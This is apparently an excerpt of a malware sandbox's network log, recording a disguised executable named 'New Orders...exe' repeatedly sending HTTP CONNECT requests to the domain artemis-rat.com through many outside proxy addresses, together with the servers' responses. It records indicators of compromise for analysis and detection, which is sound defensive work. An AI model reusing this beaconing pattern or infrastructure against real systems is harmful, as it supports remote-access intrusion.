                                                                                        Mar 11, 2024 16:16:44.777395964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1253192.168.2.953746104.18.251.208807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.778697968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.932964087 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1254192.168.2.953715147.182.194.76297037672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.778851032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.323957920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.835974932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.930749893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.132915974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.242254019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.292046070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.445280075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:05.633359909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1255192.168.2.953747104.19.109.209807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.779071093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.933552980 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1256192.168.2.951353112.78.47.188807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.779162884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:09.552134991 CET101INHTTP/1.0 200 Connection Established
                                                                                        Proxy-agent: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1257192.168.2.953553103.200.135.22941457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.779351950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1258192.168.2.95358284.47.145.18980807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.781868935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1259192.168.2.953631154.85.58.149807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.782434940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.417201996 CET321INHTTP/1.1 400 Bad Request
                                                                                        Server: openresty/1.15.8.2
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 163
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.15.8.2</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1260192.168.2.95357960.190.68.15473027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.787162066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.140419960 CET90INHTTP/1.1 200 OK
                                                                                        Content-Type: application/json
                                                                                        Connection: close
                                                                                        Content-Length: 55


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1261192.168.2.953598159.223.71.71603777672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.787163019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1262192.168.2.953709198.8.84.341457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.787355900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1263192.168.2.951309190.109.168.21780807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.793342113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.205838919 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1264192.168.2.953642203.19.38.11410807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.793811083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.126199961 CET309INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.22.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 157
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1265192.168.2.953622148.66.130.5382687672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.794070005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1266192.168.2.952948103.231.78.36807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.794775963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.190958023 CET309INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.20.1
                                                                                        Date: Mon, 11 Mar 2024 14:59:37 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 157
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1267192.168.2.95362747.74.152.2988887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.796258926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.145013094 CET309INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.20.1
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 157
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1268192.168.2.9536813.37.125.7631287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.797514915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.120599031 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1269192.168.2.953591103.83.232.122807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.797719002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.179492950 CET343INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 182
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1270192.168.2.953752154.12.253.232122637672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.798337936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.476273060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.273514986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1271192.168.2.953640128.199.221.91216057672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.802694082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.727938890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.930818081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1272192.168.2.953634114.132.202.7880807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.806644917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.376441956 CET84INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Transfer-Encoding: chunked


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1273192.168.2.953789104.22.37.236807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.812314034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.967014074 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1274192.168.2.953568103.81.117.12241537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.813117981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1275192.168.2.953807104.23.125.117807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.815285921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.969480038 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
